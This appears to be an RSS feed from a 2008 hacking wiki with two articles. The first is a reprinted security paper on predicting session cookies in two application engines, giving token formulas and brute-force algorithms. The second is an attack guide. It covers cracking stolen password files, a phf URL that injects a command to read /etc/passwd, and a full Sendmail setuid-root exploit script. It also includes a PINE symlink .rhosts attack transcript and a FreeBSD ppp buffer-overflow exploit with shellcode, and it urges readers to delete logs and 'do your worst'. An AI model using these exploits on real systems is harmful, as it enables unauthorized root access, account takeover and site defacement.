<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet href="http://crack0hack.wetpaint.com/xsl/rss2html.xsl" type="text/xsl" media="screen"?><?xml-stylesheet href="http://crack0hack.wetpaint.com/scripts/wpcss/wiki/crack0hack/skin/minimalist/rss" type="text/css" media="screen"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/"><channel><title>www.crack$hack.ws - Recently Updated Pages</title><link>http://crack0hack.wetpaint.com/pageSearch/updated</link><description>Recently Updated Pages on http://crack0hack.wetpaint.com</description><language>en-us</language><webMaster>info@wetpaint.com</webMaster><pubDate>Fri, 25 Jul 2008 03:32:15 CDT</pubDate><lastBuildDate>Fri, 25 Jul 2008 03:32:15 CDT</lastBuildDate><generator>wetpaint.com</generator><ttl>60</ttl><image><title>www.crack$hack.ws</title><url>http://image.wetpaint.com/image/4/Nli7IpkzrdLg_i8yaL7-1A433254</url><link>http://crack0hack.wetpaint.com</link><description>The world leading Hacking &amp; Security Community www.crack$hack.ws gives you all answers about Hacking and Security. 
@Join now!</description></image><item><title>Hacking Web Applications Using Cookie Poisoning</title><link>http://crack0hack.wetpaint.com/page/Hacking+Web+Applications+Using+Cookie+Poisoning</link><author>punkey8oy</author><guid isPermaLink="false">http://crack0hack.wetpaint.com/page/Hacking+Web+Applications+Using+Cookie+Poisoning</guid><pubDate>Fri, 25 Jul 2008 03:32:15 CDT</pubDate><description>Summary&lt;br&gt;
Cookie poisoning is a known technique mainly for achieving impersonation and breach of privacy through manipulation of session cookies, which maintain the identity of the client. By forging these cookies, an attacker can impersonate a valid client, and thus gain information and perform actions on behalf of the victim. The ability to forge such session cookies (or more generally, session tokens) stems from the fact that the tokens are not generated in a secure way. In this paper, we explain why session management (and session management security) is a complex task (which is why it is usually left to commercial products). We describe how the tokens are generated for two commercial application engines. We then analyze the strength of each mechanism, explain its weakness, and demonstrate how such weakness can be exploited to execute an impersonation/privacy breach attack. We discuss the feasibility of the attack. Finally, we recommend an approach to session management which separates the security from the functionality &amp;ndash; the latter is carried out by application engines, while the former should be provided by a dedicated application security product.&lt;br&gt;&lt;br&gt;
The Sisyphean in-house session maintenance&lt;br&gt;
In web application programming, session management is complex and awkward. The programmer needs to worry about many aspects of session management, which can distract him/her from the main goal &amp;ndash; implementing the business logic that makes the site unique and profitable. Specific issues are:&lt;br&gt;
&amp;bull; Session creation and identification &amp;ndash; how to ensure that when a new session is needed, it is indeed created? The programmer must identify that a client has a need for a session, create the session and assign the client a session.&lt;br&gt;
&amp;bull; Concurrency issues &amp;ndash; when two clients access the site simultaneously, each requiring a new session, it is necessary to make sure that the session creation process will still function correctly.&lt;br&gt;
&amp;bull; Session termination and timeout &amp;ndash; what triggers a session termination? How are the resources of the terminated session recycled? What happens if the client tries to access the site while the termination process is taking place? What happens when a client tries to access a site with a stale session?&lt;br&gt;
&amp;copy;2002 Sanctum, Inc. www.SanctumInc.com&lt;br&gt;
&amp;bull; Session data storage, multiple servers, fail-over &amp;ndash; where is the session data stored (on disk? in RAM?)? What is the performance penalty? What happens in a multi-server site if a client accesses a first server (and establishes a session with it) and then is directed (by a load balancer) to a second server? What happens to the client session data in case the original server crashes?&lt;br&gt;&lt;br&gt;
Security-wise, the following considerations must be made:&lt;br&gt;
&amp;bull; It should never be possible for one client to be able to predict the token another client received, or is in the process of receiving, or will receive. This is obviously a &amp;lsquo;must have&amp;rsquo; in order to prevent impersonation attacks and consequently breach of privacy.&lt;br&gt;
&amp;bull; Furthermore, it is desirable that a client will not be able to predict the next token he/she will get when accessing the site. This is useful in minimizing the damage of stealing the token while it travels (in the clear) to and fro, and while it is stored on disk at the client.&lt;br&gt;
&amp;bull; Any token should have a reasonable expiration period &amp;ndash; again, to minimize the damage of it being stolen.&lt;br&gt;&lt;br&gt;
As can be seen, it is not very easy to fulfill all these requirements, especially if the session mechanism is developed ad hoc.
The more intricate security requirements are definitely something developers, especially ones not versed in security, may easily miss. One recent example is the cookie mechanism that was employed by Verizon Wireless (www.verizonwireless.com and www.app.airtouch.com). The security problem is mentioned in the press (http://www.newsbytes.com/news/01/169781.html), and in technical resources (http://online.securityfocus.com/archive/1/211520 - a report by Marc Slemko, dated September 1st, 2001). To quote from the latter:&lt;br&gt;&lt;br&gt;
Cell phone bills are often very interesting things, since they contain names, addresses, and a complete record of calls placed and received, along with the approximate location the user was when the call was made. I&amp;#39;m sure I&amp;#39;m not alone in expecting my provider to provide a reasonable level of privacy for this data. A typical URL used by this &amp;quot;my account&amp;quot; service is:&lt;br&gt;
https://www.app.airtouch.com/jstage/plsql/ec_navigation_wrapper.nav_frame_display?p_session_id=3346178&amp;amp;p_host=ACTION&lt;br&gt;
Note the p_session_id parameter. This is the only session identifier used. They are assigned sequentially to each user as they login, and are valid until the user logs out or the session times out. Obviously, this makes it trivial to access the sessions of other users by guessing the session ID. Automated tools to grab this information in bulk as users login over time are also trivial.&lt;br&gt;&lt;br&gt;
As we see here, the problem is simple: the Verizon Wireless site assigns a token (in this case, it appears as a parameter named p_session_id) to each logged-in visitor to the site. This token is used to identify the visitor. The token value is incremented sequentially for each new visitor, hence if you&amp;rsquo;re a visitor and your p_session_id is N, the next visitor will be assigned N+1. This is an extremely predictable mechanism, and it completely violates all security requirements (although it probably fulfills all the functional requirements).
Many other examples of insufficient security in tokens are demonstrated in the work of the MIT Laboratory for Computer Science (&amp;ldquo;Dos and Don&amp;rsquo;ts of Client Authentication on the Web&amp;rdquo; by Kevin Fu, Emil Sit, Kendra Smith and Nick Feamster) http://cookies.lcs.mit.edu/pubs/webauth:tr.pdf&lt;br&gt;
So we see that it is difficult to come up with a good session management solution, let alone a secure session management solution. This is one of the reasons why application servers are so popular.&lt;br&gt;&lt;br&gt;
Application Servers/Engines &amp;ndash; a solution and a problem&lt;br&gt;
An Application Server (or Application Engine) is a software program designed to make the life of the application developer easy. It usually offers the programmer the ease of writing HTML pages with directives for the server embedded in them, instructing the server to perform various tasks. Most application servers provide the programmer an environment that takes care of the session automatically, relieving the programmer from all the worries mentioned in the above section. Examples of application servers:&lt;br&gt;
Microsoft ASP (Active Server Pages) &amp;ndash; runs on top of IIS&lt;br&gt;
Macromedia (formerly Allaire) ColdFusion&lt;br&gt;
Apache Tomcat&lt;br&gt;
Apache JServ&lt;br&gt;
PHP&lt;br&gt;
BEA WebLogic&lt;br&gt;
IBM WebSphere&lt;br&gt;
BroadVision&lt;br&gt;
Some frequency analysis can be found here (https://secure1.securityspace.com/s_survey/data/man.200203/cookieReport.html), through associating the cookie names with the server that issues them. This is of course biased, since some servers and sites use tokens in form parameters rather than in cookies. The upside of application engines is the fact that they completely relieve the programmer from worrying about session management. All functionality aspects of session management are taken care of, usually much better than an in-house programmer could have achieved.
The downside of application engines is the fact that they seem to relieve the programmer from worrying about the security of the token, yet we can show that the harsh reality is far from that. In fact, some very popular application engines do not provide secure tokens. As a result, the programmer obtains a false sense of security. We examined the tokens generated by two popular application servers. In both cases, we were able to demonstrate that the token is not as random as it seems, and that it is possible (in one case, with ease) to predict the values of the token for the next sessions (of a different client).&lt;br&gt;&lt;br&gt;
Example 1 &amp;ndash; beating a time based token&lt;br&gt;
The target of this attack is a very popular commercial application engine. The product uses two cookies to identify a session. The pair formed by the two cookies identifies the session. The first cookie is merely a counter, incremented once per new session. It probably ensures that no two pairs are ever identical. The second cookie is the token cookie, apparently intended to secure the pair by being &amp;ldquo;unpredictable&amp;rdquo;. Since it is very easy to predict the first cookie, we focus on the second cookie, which we&amp;rsquo;ll denote as &amp;ldquo;TOKEN&amp;rdquo;. At first glance, TOKEN seems to be a sequence of 8 random decimal digits. The entropy (amount of randomness) here is 10^8 = 2^26.57, which may be considered sufficient, considering that it&amp;rsquo;s quite infeasible to try such an amount of requests (100 million) against a site without triggering some kind of alarm and human attention. But a closer look reveals that in fact, TOKEN obeys the following equation: Let us denote by t the GMT time, in seconds, since 01/01/1970 00:00, as set on the application server. Let us denote by m the milliseconds portion of the tick counter on the application server.
Then:&lt;br&gt;
TOKEN = ( 31415821 * (t + m) + 1 ) mod 100000000&lt;br&gt;
It is interesting to note that t can be extracted from the HTTP Date header the server sends back to the client together with the first time the cookies are set. This means that the TOKEN cookie is quite predictable. In fact, if one knows a range of time T &amp;le; t &amp;lt; T+∆T (in seconds) in which a cookie was generated, one can infer that TOKEN has one of ∆T+1000 values, which is a rather short list of values. Testing a bit more than a thousand values against the server may take a few minutes, during which the victim session is likely to remain active. The outline of an attack algorithm is as follows:&lt;br&gt;
Obtain a first pair (id1, TOKEN1). Record t1 &amp;ndash; the server time (from the Date HTTP header)&lt;br&gt;
Wait ∆T seconds.&lt;br&gt;
Obtain a second pair (id2, TOKEN2). Record t2 &amp;ndash; the server time (from the Date HTTP header)&lt;br&gt;
if (id2 &amp;gt; id1 +1) begin // we have a victim session interjected here.&lt;br&gt;
for (x= t1 ; x &amp;lt; t2 +1000 ; x++) // which is ∆T+1000 iterations&lt;br&gt;
begin Try the pair (id1 +1, ( 31415821 * x + 1 ) mod 100000000) end&lt;br&gt;
end&lt;br&gt;
In fact, it is possible to improve this algorithm in some cases by using the fact that on some operating systems, the tick counter does not have millisecond granularity, but rather a coarser granularity of around 10 msec. This can be used to reduce the search space even further. The attack described above enables the attacker to impersonate a victim, provided that such a victim was assigned a cookie between the two samples the attacker made of the site cookies. Since the attacker can repeat the algorithm as many times as he/she would like, it is possible for him/her to obtain these cookies for all clients, at the price of sampling the site (say, one request every minute), and additionally some 1060 requests per any new client discovered.
Again, as hinted above, it is possible to sample at closer intervals (once a second) and exploit the granularity problem of the clock ticks, in which case it is probably possible to arrive at 100 requests per new client. It is likely that if an attempt to impersonate a client is performed while the site is loaded with traffic, then the additional hundreds/thousands of requests would go unnoticed, at least momentarily.&lt;br&gt;&lt;br&gt;
Example 2 &amp;ndash; When Random() isn&amp;rsquo;t random&lt;br&gt;
In this example, we deal with a still popular (yet a bit outdated) application engine. This engine generates a single cookie for each new session. This cookie (which we shall name ID) comprises 3 mandatory fields (F1, F2 and F3), and one optional (server configuration dependent) field (F4, preceded by a dot), concatenated. The fields are as follows:&lt;br&gt;
F1 = 6 characters (A-Z0-9) &amp;ndash; PRNG (Pseudo Random Number Generator) data, represented in base 36 with leading zeroes.&lt;br&gt;
F2 = 3 characters (A-Z0-9) &amp;ndash; server time (milliseconds), divided by 2000, mod 36^3 (= 46656), represented in base 36 with leading zeroes.&lt;br&gt;
F3 = 3 characters (A-Z0-9) &amp;ndash; session count in this 2 second time slice, represented in base 36.&lt;br&gt;
F4 = constant string (per server).&lt;br&gt;
As can be seen, F4 (if it exists) is constant, and hence trivially predictable. F2 is simply the server time (in seconds) divided by 2, modulo 46656, which is quite predictable, and F3 is not too obscure either &amp;ndash; it is sequentially incremented in the 2 second time slice (always beginning at one). The only interesting field is therefore F1. Apparently, it holds enough entropy to secure the system, since it can assume 36^6 values (= 2^31.0). Yet again, what seems secure at first sight turns out not so secure when performing a full analysis. An explanation of how and why F1 can be predicted is provided in Appendix A, since it is too long for inclusion here.
The problem we exploited with F1 is the fact that it uses a PRNG (Pseudo Random Number Generator), which in itself is predictable. So knowing several values of F1 suffices to fully predict the PRNG, and hence future (and past) values of F1.&lt;br&gt;
The outline of an attack is as follows:&lt;br&gt;
Preparation: Obtain three IDs, in the shortest time intervals possible. Extract the PRNG internal state (as explained in Appendix A).&lt;br&gt;
Interception Cycle:&lt;br&gt;
Obtain an ID, and record the server time, t. For simplicity, assume t is even.&lt;br&gt;
Find the PRNG internal state that was used to generate this ID (as explained in Appendix A).&lt;br&gt;
Wait ∆T seconds (where ∆T is even).&lt;br&gt;
Obtain a new ID. Advance the PRNG, and record all internal states between the PRNG state of the old ID and the PRNG state that generated this ID (as explained in Appendix A). Let the list of internal values be L.&lt;br&gt;
// ∆T/2 iterations:&lt;br&gt;
for (T=t; T&amp;lt;t+∆T; T+=2) begin&lt;br&gt;
for each internal PRNG state in L, i, begin&lt;br&gt;
Try an ID cookie consisting of: F1=generate from sample of PRNG at state i and i+1; F2=T; F3=1; // first session in this 2-second time period&lt;br&gt;
F4=F4 of any ID above; //constant per server&lt;br&gt;
end end&lt;br&gt;
As can be seen, it is feasible, although not trivial, to predict some ID cookies. For feasibility, it is required that the time interval (∆T) be short (with respect to the expected usage of the server), in order to minimize the length of L (the list of possible internal PRNG states). If these intervals are indeed very short (less than two seconds), it may be possible, with correct timing, to tell whether a new session was interjected in the current 2 second time slice, which makes the attack more effective (since it requires launching the additional requests only when it is known that a new victim session was indeed created).
It should also be mentioned that in order not to lose synchronization (of the PRNG internal state) with the site, it is necessary to keep requesting a new ID from time to time, in order to advance the attacker&amp;rsquo;s PRNG internal state to the new value. It should be remembered that the PRNG is likely to be used for many purposes, not just the creation of sessions. This means that the site may use the PRNG intensively, thus causing a quick de-synchronization (to counter which it is necessary to re-sync at close time intervals, e.g. every few minutes). On the other hand, it may be possible to get a clearer glimpse of the internal PRNG state by inspecting other random values that may be used in the site. This may offer a shortcut saving a lot of computation power.&lt;br&gt;
It should be noted that once the attacker is in sync with the site, and if IDs are extracted frequently enough, it is possible to impersonate any client at the expense of sending a few requests (depending on the usage of the PRNG).&lt;br&gt;&lt;br&gt;
What the involved vendors say&lt;br&gt;
Vendor 1 acknowledged the weakness, and informed us that its customers should use SSL certificates for session management. While this is perhaps a good idea for some customers (but definitely not for all customers &amp;ndash; moving to SSL and SSL certificates is definitely not trivial, and sometimes not possible), the documentation for its product leads the reader to believe that the built-in session management is secure (they name it &amp;ldquo;the client security token&amp;rdquo; in their documentation for developers). Also, the vendor does not make this suggestion public. Vendor 2 acknowledged the weakness yet wrote us &amp;ldquo;session cookies are -NOT- a replacement for authentication tokens. A session cookie in conjunction with a random auth token or auth login validation is both reasonable mechanisms.
This should be true in designing session based scripts - even where the session tokens are &amp;#39;trusted&amp;#39; today.&amp;rdquo; &amp;ndash; thus laying the responsibility in the hands of the developers. The two vendors, while technically acknowledging the problem, dismissed it as a non-security issue. That is, both vendors assume their customers implement their own session security tokens, not relying on the vendor tokens. The vendors, therefore, claim that their tokens are used (or should be used) solely to better differentiate between different users, and not as a security measure. In the documentation, we did not find any warning against using the token as a secure session identifier. Furthermore, Vendor 1&amp;rsquo;s documentation uses phrases that lead one to believe that this token is secure. And in reality, of course, most sites use the tokens issued by vendors as a secure session identifier, oblivious to the fact that they are weak. In a sense, the application developer is back to square one: he/she cannot trust the built-in session identification mechanism, and thus is forced to write his/her own such mechanism, with best effort to fulfill all the requirements mentioned above and to avoid the delicate pitfalls of cryptography.&lt;br&gt;&lt;br&gt;
Conclusion&lt;br&gt;
We see session security falls between the cracks &amp;ndash; vendors don&amp;rsquo;t do it right, don&amp;rsquo;t care for it, or delegate the responsibility for it to the developers, while in-house development is error-prone, and requires a deep understanding of security. In this paper, we provided real life examples of insecure tokens both in commercial application engines and in home grown applications. Our solution is simple &amp;ndash; the world of web applications should consist of three components:&lt;br&gt;
&amp;bull; The application (which is developed in house, and expresses the business logic, as well as the novelty and specialty of the company/site).&lt;br&gt;
&amp;bull; The application environment (the application engine and web server, which enable easy application development and focus on the application rather than on infrastructure).&lt;br&gt;
&amp;bull; Web application security component, which takes care of the application security, again relieving the developers (and to some extent, the application engine developers too!) from having to worry about secure implementation of their application.&lt;br&gt;
In all the above cases, a web application firewall would have fortified the tokens generated by the application engines (or by the in house developed application) transparently (the developer needn&amp;rsquo;t even be aware of this), and ensured, through using strong cryptography and security tested mechanisms, that the tokens sent to the application are indeed genuine, and not forged.&lt;br&gt;&lt;br&gt;
Appendix A &amp;ndash; Analysis of the PRNG Used in Example 2&lt;br&gt;
The PRNG in example 2 is a linear congruential PRNG. Its internal state consists of 48 bits (the variable &amp;ldquo;state&amp;rdquo;). The PRNG is seeded once (that is, an initial value for &amp;ldquo;state&amp;rdquo; is provided), and then advances in the following manner:&lt;br&gt;
state = (state * 25214903917 + 11) mod 2^48&lt;br&gt;
sample = state / 2^16&lt;br&gt;
As can be seen, sample is a 32 bit number. The ID generation mechanism concatenates two consecutive samples to form a 64 bit integer, which may be negative (if the most significant bit is 1). Then, the absolute value of this number is taken, and mod 36^6 is applied to yield F1. And now to some mathematics: we want to be able to predict the values sampled from this PRNG. We do get a direct glimpse at the state bits. To understand why, let us consider the mathematical representation of F1. Let the two samples needed for F1&amp;rsquo;s generation be denoted S1 and S2.
Then:&lt;br&gt;
S1 = [don&amp;rsquo;t care]&lt;br&gt;
S2 = state / 2^16&lt;br&gt;
N = S1 * 2^32 + S2&lt;br&gt;
if (N &amp;ge; 2^63) N = 2^64 - N //make sure N is &amp;ldquo;positive&amp;rdquo; &amp;ndash; i.e. most significant bit is 0.&lt;br&gt;
F1 = N mod 36^6&lt;br&gt;
Since 36^6 = 2^12 * 3^12, it follows that&lt;br&gt;
F1 mod 2^12 = N mod 2^12 or F1 mod 2^12 = (-N) mod 2^12&lt;br&gt;
And since N = S1 * 2^32 + S2, it follows that&lt;br&gt;
F1 mod 2^12 = S2 mod 2^12 or F1 mod 2^12 = (-S2) mod 2^12&lt;br&gt;
We see, therefore, that F1 mod 2^12 provides us with two options for the 12 least significant bits of S2, which, in turn, are bits 16-27 of state (denoting the least significant bit as 0 and the most significant bit as 47). Now, we can guess the 16 least significant bits of state, and together we&amp;rsquo;ll have the 28 least significant bits of state. We have 2^17 guesses (2^16 for the 16 least significant bits of state, and 2 for the original sign of N). The number of guesses can be easily reduced by taking another sample, as close as possible (i.e. with as few samples of the PRNG in between), and verifying against the 11 bits of information (12 bits minus the sign bit). If it is possible to obtain two IDs with less than (say) 16 advances of the PRNG in between, then with a calculation of 2^17*16 we can reduce the number of guesses we have to 2^10. Applying this argument twice more will show that with 4 IDs generated close enough, it is possible to come out with a single verified value for the 28 least significant bits of state (for all IDs), with no more than a few million calculations. Finally, we can also guess the 20 most significant bits, and we can easily verify them using the IDs we have, because once all the bits of state are known, it is possible to calculate F1 accurately. In order to check all guesses at this phase, we need to perform a few million calculations. The above can be easily performed using a standard PC (Pentium-III or Pentium-4) in a few minutes or less.
After this, the full state of the PRNG becomes known. This makes it possible to accurately follow the PRNG into the future and into the past. For example, if one has the current value of the PRNG, and an ID that was produced from the PRNG after some advances have taken place, it is possible to find the PRNG state associated with the ID, as well as all PRNG states in between (and the IDs that may have been produced for them) by simply advancing the PRNG and generating the ID, until the ID generated matches the one obtained from the server. This provides both a list of possible IDs between the time the PRNG was at the known state and the time the ID was obtained, and the current state of the PRNG (the one matching the obtained ID). It should be noted that an ID is obtained from sampling two consecutive states of the PRNG. But since it is impossible to know how the PRNG is used, we must check every possibility for consecutive pairs. So if the PRNG states are A, B, C and D we must list the IDs formed from (A,B), (B,C) and (C,D).
&lt;hr size=&quot;1&quot;&gt;&lt;br/&gt;</description></item><item><title>Hacking Webpages - The Ultimate guide</title><link>http://crack0hack.wetpaint.com/page/Hacking+Webpages+-+The+Ultimate+guide</link><author>punkey8oy</author><guid isPermaLink="false">http://crack0hack.wetpaint.com/page/Hacking+Webpages+-+The+Ultimate+guide</guid><pubDate>Fri, 25 Jul 2008 03:26:43 CDT</pubDate><description>Hacking Webpage - The Ultimate guide&lt;br&gt;
Author : Virtual Circuit and Psychotic&lt;br&gt;&lt;br&gt;
Well Psychotic wrote one of the most helpful unix text files in cyberspace but with the mail that we received after the release of our famous 36 page Unix Bible we realised that unix isn&amp;#39;t for everybody so we decided that we should write on another aspect of hacking..... Virtual Circuit and Psychotic is proud to release, &amp;quot;Hacking Webpages With a few Other Techniques.&amp;quot; We will discuss a few various ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects.&lt;br&gt;&lt;br&gt;
Getting the Password File Through FTP&lt;br&gt;
Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need to learn a little about the password file...&lt;br&gt;
root:User:d7Bdg:1n2HG2:1127:20:Superuser&lt;br&gt;
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh&lt;br&gt;
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh&lt;br&gt;
This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That&amp;#39;s the main part of the file.&lt;br&gt;
root:x:0:1:Superuser:/:&lt;br&gt;
ftp:x:202:102:Anonymous ftp:/u1/ftp:&lt;br&gt;
ftpadmin:x:203:102:ftp Administrator:/u1/ftp&lt;br&gt;
This is another example of a password file, only this one has one little difference, it&amp;#39;s shadowed. Shadowed password files don&amp;#39;t let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker (both explained later in the text).
Below is another example of a shadowed password file:&lt;br&gt;
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh&lt;br&gt;
daemon:x:1:1:0000-Admin(0000):/:&lt;br&gt;
bin:x:2:2:0000-Admin(0000):/usr/bin:&lt;br&gt;
sys:x:3:3:0000-Admin(0000):/:&lt;br&gt;
adm:x:4:4:0000-Admin(0000):/var/adm:&lt;br&gt;
lp:x:71:8:0000-lp(0000):/usr/spool/lp:&lt;br&gt;
smtp:x:0:0:mail daemon user:/:&lt;br&gt;
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:&lt;br&gt;
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico&lt;br&gt;
listen:x:37:4:Network Admin:/usr/net/nls:&lt;br&gt;
nobody:x:60001:60001:uid no body:/:&lt;br&gt;
noaccess:x:60002:60002:uid no access:/:&lt;br&gt;
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh&lt;br&gt;
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false&lt;br&gt;
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false&lt;br&gt;&lt;br&gt;
Shadowed password files have an &amp;quot;x&amp;quot; in the place of a password or sometimes they are disguised as an * as well. Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.&lt;br&gt;
Cracking a password file isn&amp;#39;t as complicated as it would seem, although the files vary from system to system.&lt;br&gt;
1. The first step that you would take is to download or copy the file.&lt;br&gt;
2. The second step is to find a password cracker and a dictionary maker. Although it&amp;#39;s nearly impossible to find a good cracker there are a few ok ones out there. I recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the password file. That&amp;#39;s where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose (ASCII, caps, lowercase, and numeric letters may also be added).
We will be releasing our password file to the public soon; it will be called Psychotic Candy, &amp;quot;The Perfect Drug.&amp;quot; As far as we know it will be one of the largest in circulation.

3. You then start up the cracker and follow the directions that it gives you.

The PHF Technique

Well I wasn&amp;#39;t sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it. The phf technique is by far the easiest way of getting a password file (although it doesn&amp;#39;t work 95% of the time). But to do the phf all you do is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that&amp;#39;s it! You just sit back and copy the file (if it works).

Telnet and Exploits

Well exploits are the best way of hacking webpages but they are also more complicated than hacking through ftp or using the phf. Before you can set up an exploit you must first have a telnet proggie; there are many different clients, you can just do a netsearch and find everything you need. It&amp;#39;s best to get an account with your target (if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each separately. I&amp;#39;m going to list a few below but the list of exploits is endless.

This exploit is known as Sendmail v.8.8.4. It creates a suid program /tmp/x that calls shell as root.
This is how you set it up:

cat &amp;lt;&amp;lt; _EOF_ &amp;gt;/tmp/x.c
#define RUN &amp;quot;/bin/ksh&amp;quot;
#include
main()
{
  execl(RUN,RUN,NULL);
}
_EOF_
#
cat &amp;lt;&amp;lt; _EOF_ &amp;gt;/tmp/spawnfish.c
main()
{
  execl(&amp;quot;/usr/lib/sendmail&amp;quot;,&amp;quot;/tmp/smtpd&amp;quot;,0);
}
_EOF_
#
cat &amp;lt;&amp;lt; _EOF_ &amp;gt;/tmp/smtpd.c
main()
{
  setuid(0); setgid(0);
  system(&amp;quot;chown root /tmp/x ;chmod 4755 /tmp/x&amp;quot;);
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/&amp;quot;[ ]*&amp;quot;// |cut -d&amp;quot; &amp;quot; -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
  echo &amp;quot;leet...&amp;quot;
  /tmp/x
fi

and now on to another exploit. I&amp;#39;m going to display the pine exploit through linux.

By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile. Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts (for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE&amp;#39;s process id as its contents. One may now simply do an echo &amp;quot;+ +&amp;quot; &amp;gt; /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.

This was written by Sean B. Hamor. For this example, hamors is the victim while catluvr is the attacker:

hamors (21 19:04) litterbox:~&amp;gt; pine
catluvr (6 19:06) litterbox:~&amp;gt; ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~&amp;gt; ls -al /tmp/ | grep hamors
-rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~&amp;gt; ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~&amp;gt; ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~&amp;gt; pine
catluvr (11 19:10) litterbox:~&amp;gt; ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~&amp;gt; echo &amp;quot;+ +&amp;quot; &amp;gt; /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~&amp;gt; cat /tmp/.302.f5a4
++
catluvr (14 19:12) litterbox:~&amp;gt; rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~&amp;gt; rlogin litterbox.org -l hamors

now on to another one, this will be the last one that I&amp;#39;m going to show. Exploitation script for the ppp vulnerability as described by no one to date, this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesn&amp;#39;t work.
This is how you set it up:

#include
#include
#include
#define BUFFER_SIZE 156 /* size of the buffer to overflow */
#define OFFSET -290 /* number of bytes to jump after the start of the buffer */

long get_esp(void)
{
  __asm__(&amp;quot;movl %esp,%eax\n&amp;quot;);
}

main(int argc, char *argv[])
{
  char *buf = NULL;
  unsigned long *addr_ptr = NULL;
  char *ptr = NULL;
  char execshell[] =
    &amp;quot;\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f&amp;quot; /* 16 bytes */
    &amp;quot;\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52&amp;quot; /* 16 bytes */
    &amp;quot;\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01&amp;quot; /* 20 bytes */
    &amp;quot;\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04&amp;quot;; /* 15 bytes, 57 total */
  int i,j;

  buf = malloc(4096);

  /* fill start of buffer with nops */
  i = BUFFER_SIZE-strlen(execshell);
  memset(buf, 0x90, i);
  ptr = buf + i;

  /* place exploit code into the buffer */
  for(i = 0; i &amp;lt; strlen(execshell); i++)
    *ptr++ = execshell[i];

  addr_ptr = (long *)ptr;
  for(i=0;i &amp;lt; (104/4); i++)
    *addr_ptr++ = get_esp() + OFFSET;
  ptr = (char *)addr_ptr;
  *ptr = 0;

  setenv(&amp;quot;HOME&amp;quot;, buf, 1);
  execl(&amp;quot;/usr/sbin/ppp&amp;quot;, &amp;quot;ppp&amp;quot;, NULL);
}

Now that you&amp;#39;ve gotten root, &amp;quot;what&amp;#39;s next?&amp;quot; Well the choice is up to you but I would recommend changing the password before you delete or change anything. To change their password all you have to do is log in via telnet with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while; you can now upload your pages, delete all the logs and just plain do your worst :)

Psychotic writes our own exploits and we will be releasing them soon, so keep your eyes open for them.
We recommend that if you are serious about learning ethical hacking that you download our Unix Bible.

